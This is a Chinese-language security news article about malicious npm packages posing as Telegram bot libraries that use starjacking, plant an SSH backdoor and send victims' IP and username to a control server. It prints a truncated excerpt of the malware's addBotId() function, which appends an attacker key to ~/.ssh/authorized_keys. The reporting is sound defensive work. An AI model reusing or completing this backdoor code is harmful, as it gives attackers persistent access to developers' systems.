安全客 04月23日 14:25
警惕!恶意 npm 包利用 Telegram 窃取 Linux 开发人员数据
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

近期出现针对Telegram机器人开发者的新型供应链攻击,恶意npm软件包伪装成合法库,植入SSH后门并窃取敏感数据。这些软件包通过模仿合法库,利用starjacking技术增强可信度,诱骗开发者安装。一旦在Linux环境中安装,恶意代码会修改authorized_keys文件,创建持久访问通道,同时窃取IP地址和用户名。此次攻击凸显了开源生态系统中的安全风险,开发者需警惕npm软件包的安全隐患。

📦 攻击目标:此次攻击专门针对在Telegram机器人生态系统中工作的Linux开发者,通过伪装成合法的Telegram机器人库的恶意npm软件包进行。

🔍 传播方式:恶意软件包如node-telegram-utils、node-telegram-bots-api等,通过复制合法软件包的文档、功能,甚至链接回正版GitHub存储库,利用starjacking技术增强可信度,诱骗开发者安装。

💻 攻击过程:在Linux环境中安装后,恶意软件包会执行隐藏函数addBotId(),修改.ssh/authorized_keys文件,植入SSH后门,创建持久访问通道。

🔑 数据窃取:恶意代码不仅注入多个SSH密钥,还窃取受害者的IP地址和用户名,发送到攻击者控制的服务器,以便进一步利用或窃取数据。

一种令人担忧的新型供应链攻击已经出现,其目标是那些在 Telegram 机器人生态系统中工作的 Linux 开发者。

在 2025 年初被发现的几个恶意 npm(Node Package Manager)软件包一直在伪装成合法的 Telegram 机器人库,目的是植入 SSH后门,并窃取开发者敏感数据。

在几个月的时间里,这些拼写近似的恶意软件包总共累积了大约 300 次下载量。尽管安装数量相对不算多,但却构成了重大的安全威胁。

这次攻击专门针对广泛使用的 node-telegram-bot-api 库,该库的下载量超过 417 万次。

恶意的变体软件包,如 node-telegram-utils、node-telegram-bots-api 和 node-telegram-util,看起来几乎与合法软件包一模一样,它们复制了合法软件包的文档、功能,甚至还链接回拥有 19000 多颗星的正版 GitHub 存储库,以此来增强可信度并欺骗开发者。

Socket.dev 的研究人员发现,这些软件包采用了一种复杂的 starjacking 技术,即它们将自己的主页链接回合法的 GitHub 存储库,从而借助原项目的声誉获取信任。

这种欺骗手段使得在粗略检查时特别难以识别这些恶意软件包,因为它们显示的星标数量与合法库相同。

在 Linux 环境中安装后,这些恶意软件包在构造函数被调用时,会自动执行一个名为 addBotId () 的隐藏函数。

这个函数会进行平台检查,如果检测到是 Linux 系统,就会在无需任何用户交互的情况下执行其恶意有效载荷。

这次攻击专门针对开发者环境,在项目设置或维护期间,开发者常常会在这种环境中安装 npm 软件包。

感染机制与持久性

该恶意软件的关键能力在于其 SSH 后门的实现。

当在 Linux 系统上执行时,恶意代码会通过追加攻击者控制的 SSH 密钥来修改 ~/.ssh/authorized_keys 文件,从而创建一个即使软件包被移除后仍然存在的持久访问通道:

async function addBotId() {

const username = os.userInfo().username;

const publicKey = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0eFAxoea78gXpURdj7ufXx1LVEOoVKawxRnwAghXH`;

if (os.platform() === ‘linux’) {

try {

const ipAddress = await getBotId();

const sshDir = path.join(os.homedir(), ‘.ssh’);

const authorizedKeysPath = path.join(sshDir, ‘authorized_keys’);

// Code continues to add SSH keys and exfiltrate data

恶意代码使得攻击者能够获得未经授权的访问权限。

这段代码不仅注入了多个 SSH 密钥以实现冗余访问,还会将受害者的 IP 地址和用户名泄露到一个命令与控制服务器(solana [.] validator [.] blog)上,这使得攻击者能够对被攻陷的系统进行登记,以便进一步利用或窃取数据。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Telegram机器人 供应链攻击 npm软件包 SSH后门
相关文章